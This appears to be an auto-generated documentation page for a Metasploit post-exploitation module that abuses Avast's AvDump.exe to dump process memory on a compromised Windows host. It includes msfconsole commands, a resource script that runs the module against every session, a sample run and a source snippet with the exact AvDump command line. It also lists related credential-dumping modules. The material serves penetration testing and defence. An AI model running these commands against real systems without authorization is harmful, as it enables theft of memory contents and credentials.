Avast AV Memory Dumping Utility - Metasploit
This page contains detailed information about how to use the post/windows/gather/avast_memory_dump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Avast AV Memory Dumping Utility
Module: post/windows/gather/avast_memory_dump
Source code: modules/post/windows/gather/avast_memory_dump.rb
Disclosure date: -
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module leverages an Avast Anti-Virus memory dump utility that is shipped by default with Avast Anti-Virus Home software suite.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/avast_memory_dump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/avast_memory_dump
msf post(avast_memory_dump) > show options
... show and set options ...
msf post(avast_memory_dump) > set SESSION session-id
msf post(avast_memory_dump) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/avast_memory_dump")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
SESSION: The session to run this module on.
PID: specify pid to dump
Knowledge Base
Vulnerable Application - Avast Home Security Suite - Avdump.exe
The Avast Home Security suite ships with a memory dumping utility that can be leveraged to dump process memory of user defined processes to user defined locations.
A detailed write up can be found at https://archcloudlabs.com/projects/dumping-memory-with-av/
Verification Steps
Verify that the path C:\\Program Files\\Avast Software Avast\\AvDump.exe
exists.
1. Start msfconsole
2. Get meterpreter session
3. Do: use post/windows/gather/avast_memory_dump
4. Do: set SESSION <session id>
5. Do: set DUMP_PATH <specify path dest>
6. Do: set PID <pid>
7. Do: run
Options
PID Specify the PID of the process you would like to dump.
DUMP_PATH Specify the location to write the memory dump to.
Scenarios
Windows 10 (2004 OS Build 19041.572)
msf5 > search avast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/avast_memory_dump normal No Avast AV Memory Dumping Utility
msf5 > use 0
msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe'
[*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131)
Filtering on 'notepad.exe'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
8504 1812 notepad.exe x64 1 DESKTOP-CD2VHVO\user C:\Windows\System32\notepad.exe
msf5 post(windows/gather/avast_memory_dump) > show options
Module options (post/windows/gather/avast_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Users\Public\test.dmp yes specify location to write dump file to
PID 8504 yes specify pid to dump
SESSION 4 yes The session to run this module on.
msf5 post(windows/gather/avast_memory_dump) > set PID 8504
PID => 8504
msf5 post(windows/gather/avast_memory_dump) > set SESSION 4
SESSION => 4
msf5 post(windows/gather/avast_memory_dump) > run
[*] [2020.10.21-22:49:24] AvDump.exe exists!
[*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp
[*] [2020.10.21-22:49:29] [2020-10-22 02:49:26.969] [info ] [dump ] [ 1400: 8032] Dumpmaster is arming.
[2020-10-22 02:49:27.047] [info ] [dump ] [ 1400: 8032] Successfully dumped process 8504 into 'C:\Users\Public\test.dmp'
[2020-10-22 02:49:27.047] [info ] [log_module ] [ 1400: 8032] LogModule is going to be destroyed.
[2020-10-22 02:49:27.047] [info ] [log_module ] [ 1400: 8032] =====================================================================================================================
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/avast_memory_dump post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/avast_memory_dump
msf6 post(windows/gather/avast_memory_dump) > show info
Name: Avast AV Memory Dumping Utility
Module: post/windows/gather/avast_memory_dump
Platform: Windows
Arch:
Rank: Normal
Provided by:
DLL_Cool_J
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Users\Public\tmp.dmp yes specify location to write dump file to
PID yes specify pid to dump
SESSION yes The session to run this module on.
Description:
This module leverages an Avast Anti-Virus memory dump utility that
is shipped by default with Avast Anti-Virus Home software suite.
Module Options
This is a complete list of options available in the windows/gather/avast_memory_dump post exploitation module:
msf6 post(windows/gather/avast_memory_dump) > show options
Module options (post/windows/gather/avast_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Users\Public\tmp.dmp yes specify location to write dump file to
PID yes specify pid to dump
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/avast_memory_dump post exploitation module:
msf6 post(windows/gather/avast_memory_dump) > show advanced
Module advanced options (post/windows/gather/avast_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/avast_memory_dump module can do:
msf6 post(windows/gather/avast_memory_dump) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/avast_memory_dump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/avast_memory_dump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
AvDump.exe does not exist on target.
Here is a relevant code snippet related to the "AvDump.exe does not exist on target." error message:
46: end
47: end
48: end
49:
50: def run
51: fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump
52: print_status('AvDump.exe exists!')
53:
54: dump_path = datastore['DUMP_PATH']
55: pid = datastore['PID'].to_s
56:
Dump file <DUMP_PATH> was not created
Here is a relevant code snippet related to the "Dump file <DUMP_PATH> was not created" error message:
55: pid = datastore['PID'].to_s
56:
57: print_status("Executing Avast memory dumping utility (#{avdump}) against pid #{pid} writing to #{dump_path}")
58: result = cmd_exec("#{avdump} --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
59:
60: fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
61: print_status(dump_path)
62: mem_file = read_file(dump_path)
63: store_loot('host.avast.memdump', 'binary/db', session, mem_file)
64:
65: print_status(result)
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14893 Merged Pull Request: Updating avast_memory_dump.rb - Adding additional AVDump.exe file paths
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14298 Merged Pull Request: Windows post-exploitation gather module - Memory dumping via Avast AvDump utility
Go back to menu.
See Also
Check also the following modules related to this module:
- post/windows/gather/ad_to_sqlite
- post/windows/gather/arp_scanner
- post/windows/gather/bitcoin_jacker
- post/windows/gather/bitlocker_fvek
- post/windows/gather/bloodhound
- post/windows/gather/cachedump
- post/windows/gather/checkvm
- post/windows/gather/dnscache_dump
- post/windows/gather/dumplinks
- post/windows/gather/enum_ad_bitlocker
- post/windows/gather/enum_ad_computers
- post/windows/gather/enum_ad_groups
- post/windows/gather/enum_ad_managedby_groups
- post/windows/gather/enum_ad_service_principal_names
- post/windows/gather/enum_ad_to_wordlist
- post/windows/gather/enum_ad_user_comments
- post/windows/gather/enum_ad_users
- post/windows/gather/enum_applications
- post/windows/gather/enum_artifacts
- post/windows/gather/exchange
- post/windows/gather/file_from_raw_ntfs
- post/windows/gather/get_bookmarks
- post/windows/gather/hashdump
- post/windows/gather/local_admin_search_enum
- post/windows/gather/lsa_secrets
- post/windows/gather/make_csv_orgchart
- post/windows/gather/memory_dump
- post/windows/gather/memory_grep
- post/windows/gather/netlm_downgrade
- post/windows/gather/ntds_grabber
- post/windows/gather/ntds_location
- post/windows/gather/outlook
- post/windows/gather/phish_windows_credentials
- post/windows/gather/psreadline_history
- post/windows/gather/resolve_sid
- post/windows/gather/reverse_lookup
- post/windows/gather/screen_spy
- post/windows/gather/smart_hashdump
- post/windows/gather/tcpnetstat
- post/windows/gather/usb_history
- post/windows/gather/win_privs
- post/windows/gather/wmic_command
- post/windows/gather/word_unc_injector
Authors
- DLL_Cool_J
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.